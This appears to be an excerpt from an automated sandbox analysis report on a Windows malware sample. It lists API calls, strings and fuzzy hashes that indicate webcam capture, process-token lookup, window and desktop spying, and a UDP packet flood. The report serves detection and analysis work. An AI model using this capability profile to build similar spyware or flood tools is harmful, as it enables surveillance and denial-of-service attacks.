                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen
                        • String ID: MZ$Mozilla/4.0 (compatible)
                        • API String ID: 2038078732-1122958964
                        • Opcode ID: d10be42031837469b98f0b27fd1faf31f20e4ff0f895af1cd78f0af11c48c121
                        • Instruction ID: 50953ecb14d96b8ad73d1700d153ed96a2a3a5bf033426cc288570bde15a6930
                        • Opcode Fuzzy Hash: d10be42031837469b98f0b27fd1faf31f20e4ff0f895af1cd78f0af11c48c121
                        • Instruction Fuzzy Hash: 3C31F5B1104359ABD210DF21DC80E9FBBEDFBC97A4F42092DF54497240D735E94987A6
                        APIs
                        • lstrlen.KERNEL32(?), ref: 10008151
                        • malloc.MSVCRT ref: 10008159
                        • lstrcpy.KERNEL32(00000000,?), ref: 10008171
                        • CharNextA.USER32(00000002,?,?,?,00000001), ref: 1000819D
                        • CharNextA.USER32(00000002,?,?,?,00000001), ref: 100081BB
                        • GetFileAttributesA.KERNEL32(00000000), ref: 100081FF
                        • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 1000820C
                        • GetLastError.KERNEL32(?,?,?,00000001), ref: 10008216
                        • CharNextA.USER32(00000000), ref: 10008234
                        • free.MSVCRT ref: 10008249
                        • free.MSVCRT ref: 10008274
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                        • String ID:
                        • API String ID: 3289936468-0
                        • Opcode ID: 59a119cb7c45412126a605b886d4178d9102734befa52582713f9f64ecd8ef38
                        • Instruction ID: 2804081b43a571549ff13c6442801562d5d8ebc32c66b6e44589b798cfba9b7b
                        • Opcode Fuzzy Hash: 59a119cb7c45412126a605b886d4178d9102734befa52582713f9f64ecd8ef38
                        • Instruction Fuzzy Hash: 8A415171C046A59FF711CF5888447EABBE9FF0A7E0F10056AE9E1A3285D3741B428BA5
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D102
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D1B9
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 1000D1C8
                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D1D1
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1000D1E4
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000), ref: 1000D20C
                        • CloseHandle.KERNEL32(00000000), ref: 1000D215
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileResource$??2@??3@$CloseCreateDirectoryFindHandleLoadLockReadSizeSystem
                        • String ID: .key$XXXXXX
                        • API String ID: 710762369-2601115946
                        • Opcode ID: 960c52ec033d5b8126c188698e3d9020b8b630395b08c1ecb4395ca261ac0106
                        • Instruction ID: 5581ddf27e347247a7fb535f9d70361da8d6f8714698d154567c7804f2d0400d
                        • Opcode Fuzzy Hash: 960c52ec033d5b8126c188698e3d9020b8b630395b08c1ecb4395ca261ac0106
                        • Instruction Fuzzy Hash: 93313B716006082FE318DA788C55A6B768BFBC5370F140B2DFA67872D1EDB49D0986A1
                        APIs
                          • Part of subcall function 10019AF0: CoCreateInstance.OLE32(10070464,00000000,00000001,100703A4,?,?,?,?,?,10019543,?,?), ref: 10019B0E
                          • Part of subcall function 10019AF0: CoCreateInstance.OLE32(10070474,00000000,00000003,10070394,?,?,?,?,?,10019543,?,?), ref: 10019B22
                        • CoCreateInstance.OLE32(100703D4,00000000,00000001,100703E4,?,?,Capture Filter,?,?,?,?), ref: 1001958D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInstance
                        • String ID: *,$Capture Filter$Grabber$iavs$vids
                        • API String ID: 542301482-3686165303
                        • Opcode ID: be9dc0dd849007bed87e914a06724835c3182501307860bfc12579933516edb0
                        • Instruction ID: ba961f77ed63549915f5db2d7bb8238210d4239eb663d98b2e14bda2b524e854
                        • Opcode Fuzzy Hash: be9dc0dd849007bed87e914a06724835c3182501307860bfc12579933516edb0
                        • Instruction Fuzzy Hash: EBC116B86047019FD714CF29C894A1AB7E9FF88714F108A5CF996DB3A1DB34E846CB61
                        APIs
                          • Part of subcall function 100127B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                          • Part of subcall function 100127B0: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                          • Part of subcall function 100127B0: Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                          • Part of subcall function 100127B0: _strcmpi.MSVCRT ref: 100127E8
                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 10012975
                        • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 1001298F
                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 100129B5
                        • ??2@YAPAXI@Z.MSVCRT(?), ref: 100129C2
                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 100129E4
                        • ??2@YAPAXI@Z.MSVCRT(00000100), ref: 10012A06
                        • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 10012A36
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@Token$InformationOpenProcess$AccountCreateFirstLookupProcess32SnapshotToolhelp32_strcmpi
                        • String ID: explorer.exe
                        • API String ID: 2062827286-3187896405
                        • Opcode ID: db4a848623fc774571cc2e19b1a1c1f5b186ca9992906693b5c3e3ec49fb7def
                        • Instruction ID: b2e4f4ef2825314356661bba0bcf310c657f9a92968df79a70ce3ff17c881b44
                        • Opcode Fuzzy Hash: db4a848623fc774571cc2e19b1a1c1f5b186ca9992906693b5c3e3ec49fb7def
                        • Instruction Fuzzy Hash: CE411CB1D10228ABDB11DF95DD85BDEBBB8FF48710F10415AF509E7240D6706980CFA1
                        APIs
                        • wsprintfA.USER32 ref: 1000A9ED
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000AA12
                        • wsprintfA.USER32 ref: 1000AA87
                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000AAA3
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000AAC7
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 1000AACE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$Filewsprintf$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWrite
                        • String ID: Ball\$XXXXXX
                        • API String ID: 1973673485-3982136319
                        • Opcode ID: 7297c3a35fe4b4f02ae8765d71dd86beb2f52239b6f261adb1cb4e129df90550
                        • Instruction ID: de5178c9449cd941919d7e354767f637b9ad306068a8253cfda28b2b1ae140fc
                        • Opcode Fuzzy Hash: 7297c3a35fe4b4f02ae8765d71dd86beb2f52239b6f261adb1cb4e129df90550
                        • Instruction Fuzzy Hash: D731F63220070427E728CA74CC56BBB7396EBC4721F444B2DFA62972C0DEF4AE088655
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E4A
                        • GetStdHandle.KERNEL32(000000F4,00406360,00000000,?,00000000,00000000), ref: 00403F20
                        • WriteFile.KERNEL32(00000000), ref: 00403F27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: File$HandleModuleNameWrite
                        • String ID: ...$<program name unknown>$HB$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                        • API String ID: 3784150691-2703363937
                        • Opcode ID: f717f11deb201dad7ae5af87787efbf00a48da8aada41b396d2cdb4a947c31a7
                        • Instruction ID: 3a94ef448c9afaef0a32ab9c24a7d2e2257f3dbe680842ec591f5d33ab00a377
                        • Opcode Fuzzy Hash: f717f11deb201dad7ae5af87787efbf00a48da8aada41b396d2cdb4a947c31a7
                        • Instruction Fuzzy Hash: CF31A572A40218AEEF20EBA1DC45FDA77ACDB85304F50007BF645F61C0D678EA458A5D
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 10004DA4
                        • socket.WS2_32(00000002,00000002,00000011), ref: 10004DC1
                        • htons.WS2_32 ref: 10004DEA
                        • inet_addr.WS2_32(1007DDAC), ref: 10004DFA
                        • sendto.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000,?,00000010), ref: 10004E29
                        • Sleep.KERNEL32(00000028,?,00000000,?,00000010,00000002), ref: 10004E32
                        • RtlExitUserThread.NTDLL(00000000), ref: 10004E3F
                        Strings
                        • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10004DAA, 10004E23
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitSleepStartupThreadUserhtonsinet_addrsendtosocket
                        • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                        • API String ID: 3602400006-4039768343
                        • Opcode ID: c1f556c251400657eb1e30c84827f264690a61401817fbe1cb207322a6700dcd
                        • Instruction ID: 90c71b7bb6e61d30f0624594ab345b76b042f5c92a6c2ebc0559afc57d846c9e
                        • Opcode Fuzzy Hash: c1f556c251400657eb1e30c84827f264690a61401817fbe1cb207322a6700dcd
                        • Instruction Fuzzy Hash: 6111B2751043A16BF300DF34CC49B6A7BA5FF89754F000A1EF591972E1EBB48D09876A
                        APIs
                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F01,?,Microsoft Visual C++ Runtime Library,00012010,?,00406360,?,004063B0,?,?,?,Runtime Error!Program: ), ref: 00404BFD
                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404C15
                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404C26
                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404C33
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                        • API String ID: 2238633743-4044615076
                        • Opcode ID: f3d9b38339054170dee7f7c13b53dafa238c8ef8bd6e845d137870cf324b1691
                        • Instruction ID: fe66ae4341d90bc739ec6e5161b9fd1c2a97fef559cf143139a0882326c23769
                        • Opcode Fuzzy Hash: f3d9b38339054170dee7f7c13b53dafa238c8ef8bd6e845d137870cf324b1691
                        • Instruction Fuzzy Hash: AB01B5B1304311DBD7209FB59C80E2B3AE8A6C4750392043BA201E22A1DB798C66DB6C
                        APIs
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E38A
                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000E3BC
                        • LocalAlloc.KERNEL32(00000040,?), ref: 1000E41B
                        • malloc.MSVCRT ref: 1000E45C
                        • malloc.MSVCRT ref: 1000E467
                        • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?), ref: 1000E4EE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$AllocEnumInfoLocalOpenQueryValue
                        • String ID:
                        • API String ID: 574313380-0
                        • Opcode ID: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                        • Instruction ID: bb9a7d347bb041ea3a9a040723aaed71b44e7cb60e8ddc26bc67e4ff82bae617
                        • Opcode Fuzzy Hash: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                        • Instruction Fuzzy Hash: B461AD716083559FD318CF28C880A6BBBEAEBC8794F44492DF58AD7350D671EE05CB92
                        APIs
                        • LCMapStringW.KERNEL32(00000000,00000100,0040642C,00000001,00000000,00000000,00000103,00000001,00000000,?,004043AC,00200020,00000000,?,00000000,00000000), ref: 00404F01
                        • LCMapStringA.KERNEL32(00000000,00000100,00406428,00000001,00000000,00000000,?,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 00404F1D
                        • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004043AC,?,00000103,00000001,00000000,?,004043AC,00200020,00000000,?,00000000,00000000), ref: 00404F66
                        • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004043AC,00200020,00000000,?,00000000,00000000), ref: 00404F9E
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004043AC,00200020,00000000,?,00000000), ref: 00404FF6
                        • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004043AC,00200020,00000000,?,00000000), ref: 0040500C
                        • LCMapStringW.KERNEL32(00000000,?,004043AC,00000000,004043AC,?,?,004043AC,00200020,00000000,?,00000000), ref: 0040503F
                        • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004043AC,00200020,00000000,?,00000000), ref: 004050A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: String$ByteCharMultiWide
                        • String ID:
                        • API String ID: 352835431-0
                        • Opcode ID: 6d3657f98f60a207bc577e76de786c6caa3711f3d369ee5d4e84ee35ea663fe1
                        • Instruction ID: c68f3dabe40d83361ce39872f2a0007b0c438f6f028ced7926cde76c164a2d90
                        • Opcode Fuzzy Hash: 6d3657f98f60a207bc577e76de786c6caa3711f3d369ee5d4e84ee35ea663fe1
                        • Instruction Fuzzy Hash: 8F517A72500609EFCF218F94DD45A9F7FB9EB49740F20413AF915B22A0D33A8921DFA9
                        APIs
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 10019198
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191AE
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191C8
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191EA
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 100191FA
                        • CloseWindow.USER32(?), ref: 10019209
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 10019213
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 10019237
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A42B,000000FF,10019138), ref: 1001924E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@$Close$HandleWindow
                        • String ID:
                        • API String ID: 3237098652-0
                        • Opcode ID: 6ebae71b9889a50d7698d25c25ed4ee76a838a70805ed3283fe6ed3b9e27f439
                        • Instruction ID: 3f3fa4b0f2629bf46d15d3f9be3c4c2593fc33d32d1ab2c115334ec77ff2c56e
                        • Opcode Fuzzy Hash: 6ebae71b9889a50d7698d25c25ed4ee76a838a70805ed3283fe6ed3b9e27f439
                        • Instruction Fuzzy Hash: 74419CB9600B419FC724CF69C980916B7FAFF897007448A2DE14A8BB21D731FC84CBA1
                        APIs
                        • GetWindowTextA.USER32(?,?,00000400), ref: 100121FF
                        • IsWindowVisible.USER32(?), ref: 10012206
                        • lstrlen.KERNEL32(?), ref: 1001221F
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 1001222D
                        • lstrlen.KERNEL32(?), ref: 1001223A
                        • Sleep.KERNEL32(00000001), ref: 10012243
                        • LocalSize.KERNEL32 ref: 1001224A
                        • LocalReAlloc.KERNEL32(?,?,00000042), ref: 10012259
                        • lstrlen.KERNEL32(?,?,?,00000042), ref: 10012270
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locallstrlen$AllocWindow$SizeSleepTextVisible
                        • String ID:
                        • API String ID: 2862634755-0
                        • Opcode ID: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                        • Instruction ID: 5eb06bed97a335b8234b3696713a2b12a2f981ab1a7416895ae039800fdcde67
                        • Opcode Fuzzy Hash: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                        • Instruction Fuzzy Hash: A121A4B2200355AFE714DF64CC85AAB73E9FB88304F01082CFB1697240EBB4E949CB65
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 10012B22
                        • GetThreadDesktop.USER32(00000000), ref: 10012B29
                        • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B56
                        • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10012B61
                        • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B8E
                        • lstrcmpiA.KERNEL32(?,?), ref: 10012B9D
                        • SetThreadDesktop.USER32(00000000), ref: 10012BA8
                        • CloseDesktop.USER32(00000000), ref: 10012BC0
                        • CloseDesktop.USER32(00000000), ref: 10012BC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
